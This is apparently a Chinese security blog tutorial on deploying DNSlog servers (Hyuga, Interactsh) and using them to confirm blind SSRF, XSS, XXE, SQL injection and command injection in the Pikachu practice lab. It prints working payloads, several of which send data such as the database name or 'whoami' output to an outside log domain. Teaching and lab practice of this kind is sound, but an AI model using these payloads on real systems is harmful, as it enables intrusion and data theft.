<p>如果出现不生效可以参考：<br><a target="_blank" rel="noopener" href="https://blog.csdn.net/booklijian/article/details/116491288?spm=1001.2101.3001.6661.1&amp;utm_medium=distribute.pc_relevant_t0.none-task-blog-2~default~CTRLIST~default-1.no_search_link&amp;depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2~default~CTRLIST~default-1.no_search_link&amp;utm_relevant_index=1">https://blog.csdn.net/booklijian/article/details/116491288?spm=1001.2101.3001.6661.1&amp;utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.no_search_link&amp;depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.no_search_link&amp;utm_relevant_index=1</a></p>
<p>为了兼容国内VPS还需要修改Dockerfile添加Golang代理,要不然go get会失败:</p>
<p><code>RUN export GOPROXY=https://goproxy.io &amp;amp;&amp;amp; go get .</code></p>
<h3 id="Hyuga"><a href="#Hyuga" class="headerlink" title="Hyuga"></a>Hyuga</h3><p><strong>git下载</strong></p>
<figure class="highlight awk"><table><tbody><tr><td class="code"><pre><span class="line">git clone https:<span class="regexp">//gi</span>thub.com<span class="regexp">/Buzz2d0/</span>Hyuga.git</span><br><span class="line">cd Hyuga</span><br></pre></td></tr></tbody></table></figure>

<p><strong>修改config.xml文件</strong></p>
<p>main中填写自己的域名（比如是log.xxx.xx）<br>修改对应的ns为自己的ns域名(比如ns.xxx.xx)</p>
<p><strong>Docker快速组建</strong>:</p>
<figure class="highlight ebnf"><table><tbody><tr><td class="code"><pre><span class="line"><span class="attribute">docker-compose build</span></span><br><span class="line"><span class="attribute">docker-compose up -d</span></span><br></pre></td></tr></tbody></table></figure>

<p><strong>成功后如官网demo所示</strong></p>
<p><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/54f1e34e946e45fb84321915135eecb4.png"></p>
<h3 id="Interactsh"><a href="#Interactsh" class="headerlink" title="Interactsh"></a>Interactsh</h3><ol>
<li>手工搭建</li>
</ol>
<p>安装Golang 1.16.1环境:</p>
<figure class="highlight vim"><table><tbody><tr><td class="code"><pre><span class="line">apt-<span class="built_in">get</span> <span class="keyword">update</span></span><br><span class="line">apt-<span class="built_in">get</span> -<span class="keyword">y</span> upgrade</span><br><span class="line">apt install  -<span class="keyword">y</span> gcc</span><br><span class="line"><span class="built_in">mkdir</span> tmp</span><br><span class="line"><span class="keyword">cd</span> /tmp</span><br><span class="line">wget http<span class="variable">s:</span>//<span class="keyword">dl</span>.google.<span class="keyword">com</span>/<span class="keyword">go</span>/go1.<span class="number">16.1</span>.linux-amd64.tar.gz</span><br><span class="line">tar -xvf go1.<span class="number">16.1</span>.linux-amd64.tar.gz </span><br><span class="line">mv <span class="keyword">go</span> /usr/local/</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"export GOROOT=/usr/local/go"</span> &gt;&gt;  ~/.<span class="keyword">profile</span></span><br><span class="line"><span class="keyword">echo</span> <span class="string">"export GOPATH=$HOME/go"</span> &gt;&gt;  ~/.<span class="keyword">profile</span></span><br><span class="line"><span class="keyword">echo</span> <span class="string">"export PATH=$GOPATH/bin:$GOROOT/bin:$PATH"</span> &gt;&gt; ~/.<span class="keyword">profile</span></span><br><span class="line"><span class="keyword">source</span> ~/.<span class="keyword">profile</span></span><br></pre></td></tr></tbody></table></figure>
<p>安装Interachsh Server</p>
<p><code>go get -v github.com/projectdiscovery/interactsh/cmd/interactsh-server@latest</code></p>
<ol start="2">
<li>docker搭建</li>
</ol>
<p><code>docker run projectdiscovery/interactsh-server:latest -domain log.log4j.ga</code></p>
<h2 id="SSRF盲打"><a href="#SSRF盲打" class="headerlink" title="SSRF盲打"></a>SSRF盲打</h2><p><strong>靶场实例练习</strong></p>
<ol>
<li><p> Pikachu 靶场一个 SSRF 漏洞 实例：<br><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/ea6c8be436114ee99ff42e649ffff42c.png"></p>
</li>
<li><p>点击链接发现发现它通过一个 url 参数传递了一个 URL 给后台并读取文件（可能靶场环境问题此处没成功读取到诗歌文件url=<a target="_blank" rel="noopener" href="http://127.0.0.1/lab/vul/ssrf/ssrf_info/info1.php%EF%BC%89%EF%BC%9A">http://127.0.0.1/lab/vul/ssrf/ssrf_info/info1.php）：</a><br><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/a47c976b53034e14a22c828833474bc7.png"></p>
</li>
<li><p>修改 url 参数为如下，可借助 SSRF 漏洞进行内网端口探测：<br><code>url=http://127.0.0.1:3306</code><br><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/bbb23c4f1d88405e8a1b3824b890d68d.png"></p>
</li>
<li><p>修改 url 参数为如下，可借助 SSRF 漏洞读取本地文件：</p>
</li>
</ol>
<p><code>url=file:///C:/Windows/system32/drivers/etc/hosts</code><br><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/4bbeb421854443e9b1f3d76da81680a9.png"></p>
<ol start="5">
<li>在 DNSlog 平台申请一个子域名,然后访问 ?url=<a href="http://8b7b7d7c.log.xxx.cf，如下：">http://8b7b7d7c.log.xxx.cf，如下：</a><br><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/98f06710ee98419ab6a11698cc486c3c.png"><br><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/637505a9ae31421d910772f782ef0bb2.png"></li>
</ol>
<h2 id="XSS的盲打"><a href="#XSS的盲打" class="headerlink" title="XSS的盲打"></a>XSS的盲打</h2><p>在实战中能真正能构成致命性损伤的 XSS 类型就是储存型 XSS，一般是从前台打到后台，一般反射型 XSS 我们常见做法一般是给自己弹个 alert 就可以知道这个语句有没有执行，有没有被屏蔽。但是前台打到后台的储存型盲打 XSS 我们肯定是不可能通过 alert 去验证漏洞是否存在。弹 alert 必然是要惊动管理员，况且就算在后台弹窗了，我们也看不到。</p>
<p>，比如说这有个留言框，我们输入个 Payload 如下：<br><code>好的管理员！&lt;script src=http://testxss.a.com&gt;&lt;/script&gt;</code></p>
<p>因为 script 标签的 src 是在加载后就自动去请求的，并且 http 协议仍然会用到 dns 协议，当管理员从留言板看到这条消息的时候浏览器就会自动去请求 <a target="_blank" rel="noopener" href="http://testxss.a.com,这样子的话,就会在/">http://testxss.a.com，这样子的话，就会在</a> DNSlog 里留下如下记录：<br><code>testxss.a.com 10.0.0.0</code></p>
<p>当我们在 dnslog 里看到了这条记录的时候，就说明盲打 XSS 存在了。</p>
<h3 id="靶场-XSS-盲打实例"><a href="#靶场-XSS-盲打实例" class="headerlink" title="靶场 XSS 盲打实例"></a>靶场 XSS 盲打实例</h3><ol>
<li><p>以 Pikachu 靶场的一个 XSS 漏洞环境为例：<br><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/667c816c06d04b7ba7547c28c3aa6a33.png"></p>
</li>
<li><p>插入 <code>&lt;script&gt;alert(1)&lt;/script&gt;</code>即可触发弹窗：<br><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/159bad135ea6473fa8ed565b4937e352.png"></p>
</li>
<li><p>接下来插入<code>&lt;script src="http://8b7b7d7c.log.xxx.cf"&gt;&lt;/script&gt;</code>：<br><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/e5935cf029724774baa71edf9ca494c7.png"></p>
</li>
<li><p>可以在 DNSlog 平台看到对应的请求记录：<br><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/4afa529d82514d888d422f4eaa8c624a.png"><br>此处的 Payload 使用<code>&lt;img src="http://8b7b7d7c.log.xxx.cf"&gt;</code>也可以</p>
</li>
</ol>
<h3 id="XXE的盲打"><a href="#XXE的盲打" class="headerlink" title="XXE的盲打"></a>XXE的盲打</h3><p>对于没有回显的 XXE 漏洞，同样可以使用 DNSlog 平台进行漏洞检测。</p>
<p><strong>XXE 盲打靶场实例</strong></p>
<ol>
<li>以 Pikachu 靶场的 XXE 漏洞环境为例：</li>
</ol>
<p><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/4409393bb40649a1813f1956b9c195f6.png"></p>
<ol start="2">
<li>先构建常规测试 Payload：<figure class="highlight xml"><table><tbody><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version = "1.0"?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">note</span> [</span></span><br><span class="line"><span class="meta">    <span class="meta">&lt;!ENTITY <span class="meta-keyword">hacker</span> <span class="meta-string">"Tr0e"</span>&gt;</span></span></span><br><span class="line"><span class="meta">]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">name</span>&gt;</span><span class="symbol">&amp;hacker;</span><span class="tag">&lt;/<span class="name">name</span>&gt;</span></span><br></pre></td></tr></tbody></table></figure>
<img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/41061dd9b1df4c79942605e4dde0b822.png"></li>
<li>借助 XXE 漏洞构造读取本地文件的 Payload：<figure class="highlight xml"><table><tbody><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version="1.0"?&gt;</span> </span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">foo</span> [    </span></span><br><span class="line"><span class="meta"><span class="meta">&lt;!ENTITY <span class="meta-keyword">xxe</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">"file:///c:/windows/win.ini"</span> &gt;</span> ]&gt;</span> </span><br><span class="line"><span class="tag">&lt;<span class="name">foo</span>&gt;</span><span class="symbol">&amp;xxe;</span><span class="tag">&lt;/<span class="name">foo</span>&gt;</span></span><br></pre></td></tr></tbody></table></figure></li>
</ol>
<p><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/deca0b4f301d4e03a5f2c24ad94042eb.png"></p>
<ol start="4">
<li>假设这是一个 XXE 无回显的漏洞，或者说不清楚服务器是什么操作系统、不清楚文件组成，可以构造如下 DNSlog 相关的 Payload：</li>
</ol>
<!--?xml version="1.0"?--><p> ]&gt;<br><foo>&amp;xxe;</foo></p>
<p><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/4345c781e8fd48329ccd63b77bd59834.png"></p>
<h2 id="SQL的盲注"><a href="#SQL的盲注" class="headerlink" title="SQL的盲注"></a>SQL的盲注</h2><p>不论是布尔型盲注还是时间型盲注，都需要频繁的跑请求才能够获取数据库中的值，在现代 WAF 的防护下，很可能导致 IP 被 ban。我们可以结合 DNSlog 完美快速的将数据取出。如遇到 MySql 的盲注时，可以利用内置函数 load_file() 来完成 DNSlog，load_file()不仅能够加载本地文件，同时也能对诸如 \<a target="_blank" rel="noopener" href="http://www.test.com/">www.test.com</a> 这样的URL发起请求。</p>
<p><strong>SQL盲注靶场实例</strong></p>
<ol>
<li><p>下面同样以 Pikachu 靶场的 SQL 盲注（布尔型）漏洞环境为例：<br><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/c3dbc8b2254f4b8c83af148d48bb5ef5.png"></p>
</li>
<li><p>输入kobe’ and 1=1#可成功查询：<br><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/2c9f9344e113416a8c7c53ce308a7573.png"></p>
</li>
<li><p>输入kobe’ and 1=2#查询失败:<br><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/9b6fbbade3504547a14c750f04b9dafc.png"></p>
</li>
<li><p>输入利用 DNSlog 回显数据库名称的 Payload：<br><code>?id=1' and load_file(concat('\\\\',(select database()),'.stzi44.dnslog.cn\\abc'))--+</code></p>
</li>
</ol>
<p>注：dnslog注入只能用于windows，因为load_file这个函数的主要目的还是读取本地的文件，所以我们在拼接的时候需要在前面加上两个//，这两个斜杠的目的是为了使用load_file可以查询的unc路径。但是Linux服务器没有unc路径，也就无法使用dnslog注入</p>
<h2 id="RCE的盲打"><a href="#RCE的盲打" class="headerlink" title="RCE的盲打"></a>RCE的盲打</h2><table>
<thead>
<tr>
<th>操作系统</th>
<th>盲注方式</th>
</tr>
</thead>
<tbody><tr>
<td>windows</td>
<td>%variable%</td>
</tr>
<tr>
<td>linux</td>
<td>反引号 variable 反引号</td>
</tr>
</tbody></table>
<p>windows  Payload：</p>
<p><code>%OS%.8b7b7d7c.log.xxx.cf</code><br><img src="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/f46eafd6692b40d8ba820c54fa582818.png"></p>
<p><strong>windows常用变量</strong></p>
<figure class="highlight awk"><table><tbody><tr><td class="code"><pre><span class="line"><span class="regexp">//</span>变量                 类型       描述</span><br><span class="line"><span class="regexp">//</span>%ALLUSERSPROFILE%   本地       返回“所有用户”配置文件的位置。</span><br><span class="line"><span class="regexp">//</span>%APPDATA%           本地       返回默认情况下应用程序存储数据的位置。</span><br><span class="line"><span class="regexp">//</span>%CD%                                                        本地       返回当前目录字符串。</span><br><span class="line"><span class="regexp">//</span>%CMDCMDLINE%        本地       返回用来启动当前的 Cmd.exe 的准确命令行。</span><br><span class="line"><span class="regexp">//</span>%CMDEXTVERSION%     系统       返回当前的“命令处理程序扩展”的版本号。</span><br><span class="line"><span class="regexp">//</span>%COMPUTERNAME%      系统       返回计算机的名称。</span><br><span class="line"><span class="regexp">//</span>%COMSPEC%           系统       返回命令行解释器可执行程序的准确路径。</span><br><span class="line"><span class="regexp">//</span>%DATE%              系统       返回当前日期。使用与 date /t 命令相同的格式。由 Cmd.exe 生成。有关 date 命令的详细信息，请参阅 Date。</span><br><span class="line"><span class="regexp">//</span>%ERRORLEVEL%        系统       返回上一条命令的错误代码。通常用非零值表示错误。</span><br><span class="line"><span class="regexp">//</span>%HOMEDRIVE%         系统       返回连接到用户主目录的本地工作站驱动器号。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。</span><br><span class="line"><span class="regexp">//</span>%HOMEPATH%          系统       返回用户主目录的完整路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。</span><br><span class="line"><span class="regexp">//</span>%HOMESHARE%         系统       返回用户的共享主目录的网络路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。</span><br><span class="line"><span class="regexp">//</span>%LOGONSERVER%       本地       返回验证当前登录会话的域控制器的名称。</span><br><span class="line"><span class="regexp">//</span>%NUMBER_OF_PROCESSORS%         系统      指定安装在计算机上的处理器的数目。</span><br><span class="line"><span class="regexp">//</span>%OS%                           系统      返回操作系统名称。Windows <span class="number">2000</span> 显示其操作系统为 Windows_NT。</span><br><span class="line"><span class="regexp">//</span>%PATH%                         系统       指定可执行文件的搜索路径。</span><br><span class="line"><span class="regexp">//</span>%PATHEXT%                      系统       返回操作系统认为可执行的文件扩展名的列表。</span><br><span class="line"><span class="regexp">//</span>%PROCESSOR_ARCHITECTURE%       系统       返回处理器的芯片体系结构。值：x86 或 IA64（基于 Itanium）。</span><br><span class="line"><span class="regexp">//</span>%PROCESSOR_IDENTFIER%          系统       返回处理器说明。</span><br><span class="line"><span class="regexp">//</span>%PROCESSOR_LEVEL%              系统       返回计算机上安装的处理器的型号。</span><br><span class="line"><span class="regexp">//</span>%PROCESSOR_REVISION%           系统       返回处理器的版本号。</span><br><span class="line"><span class="regexp">//</span>%PROMPT%                       本地       返回当前解释程序的命令提示符设置。由 Cmd.exe 生成。</span><br><span class="line"><span class="regexp">//</span>%RANDOM%                       系统       返回 <span class="number">0</span> 到 <span class="number">32767</span> 之间的任意十进制数字。由 Cmd.exe 生成。</span><br><span class="line"><span class="regexp">//</span>%SYSTEMDRIVE%                  系统       返回包含 Windows server operating system 根目录（即系统根目录）的驱动器。</span><br><span class="line"><span class="regexp">//</span>%SYSTEMROOT%                   系统       返回 Windows server operating system 根目录的位置。</span><br><span class="line"><span class="regexp">//</span>%TEMP%和%TMP%                  系统和用户 返回对当前登录用户可用的应用程序所使用的默认临时目录。有些应用程序需要 TEMP，而其他应用程序则需要 TMP。</span><br><span class="line"><span class="regexp">//</span>%TIME%                         系统       返回当前时间。使用与time /t命令相同的格式。由Cmd.exe生成。有关time命令的详细信息，请参阅 Time。</span><br><span class="line"><span class="regexp">//</span>%USERDOMAIN%                   本地       返回包含用户帐户的域的名称。</span><br><span class="line"><span class="regexp">//</span>%USERNAME%                     本地       返回当前登录的用户的名称。</span><br><span class="line"><span class="regexp">//</span>%USERPROFILE%                  本地       返回当前用户的配置文件的位置。</span><br><span class="line"><span class="regexp">//</span>%WINDIR%                       系统       返回操作系统目录的位置。</span><br></pre></td></tr></tbody></table></figure>


<p>如果是 Linux 环境，则 Payload 对应的应该为：</p>
<figure class="highlight apache"><table><tbody><tr><td class="code"><pre><span class="line"><span class="attribute">ping</span> `whoami`.<span class="number">8</span>b<span class="number">7</span>b<span class="number">7</span>d<span class="number">7</span>c.log.xxx.cf</span><br></pre></td></tr></tbody></table></figure>

<p>参考：<br><a target="_blank" rel="noopener" href="https://bbs.ichunqiu.com/thread-61037-1-1.html">https://bbs.ichunqiu.com/thread-61037-1-1.html</a><br><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/0c1c23d80098">https://www.jianshu.com/p/0c1c23d80098</a><br><a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/news/221937">https://cloud.tencent.com/developer/news/221937</a><br><a target="_blank" rel="noopener" href="https://github.com/ADOOO/DnslogSqlinj">https://github.com/ADOOO/DnslogSqlinj</a><br><a target="_blank" rel="noopener" href="https://idc.wanyunshuju.com/aqst/1889.html">https://idc.wanyunshuju.com/aqst/1889.html</a><br><a target="_blank" rel="noopener" href="https://www.cnblogs.com/Chorder/p/9087386.html">https://www.cnblogs.com/Chorder/p/9087386.html</a><br><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/721b49c95d98">https://www.jianshu.com/p/721b49c95d98</a><br><a target="_blank" rel="noopener" href="https://forum.butian.net/share/1055">https://forum.butian.net/share/1055</a><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_43416157/article/details/116788106">https://blog.csdn.net/qq_43416157/article/details/116788106</a><br><a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1710514">https://cloud.tencent.com/developer/article/1710514</a><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/booklijian/article/details/116491288?spm=1001.2101.3001.6661.1&amp;utm_medium=distribute.pc_relevant_t0.none-task-blog-2~default~CTRLIST~default-1.no_search_link&amp;depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2~default~CTRLIST~default-1.no_search_link&amp;utm_relevant_index=1">https://blog.csdn.net/booklijian/article/details/116491288?spm=1001.2101.3001.6661.1&amp;utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.no_search_link&amp;depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.no_search_link&amp;utm_relevant_index=1</a><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_39190897/article/details/117197126">https://blog.csdn.net/weixin_39190897/article/details/117197126</a></p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">leaves</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://greenleavesl.github.io/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/">http://greenleavesl.github.io/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">leaves</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            <span class="chip bg-color">无标签</span>
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="far fa-dot-circle"></i>&nbsp;本篇
            </div>
            <div class="card">
                <a href="/2022/01/06/DNSlog%E5%B7%A5%E5%85%B7%E5%8E%9F%E7%90%86%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/2.jpg" class="responsive-img" alt="DNSlog工具原理搭建及使用">
                        
                        <span class="card-title">DNSlog工具原理搭建及使用</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-01-06
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            leaves
                            
                        </span>
                    </div>
                </div>

                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2021/12/26/frp%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/8.jpg" class="responsive-img" alt="frp内网穿透">
                        
                        <span class="card-title">frp内网穿透</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2021-12-26
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E5%B7%A5%E5%85%B7/" class="post-category">
                                    工具
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/frp/">
                        <span class="chip bg-color">frp</span>
                    </a>
                    
                    <a href="/tags/%E5%86%85%E7%BD%91/">
                        <span class="chip bg-color">内网</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
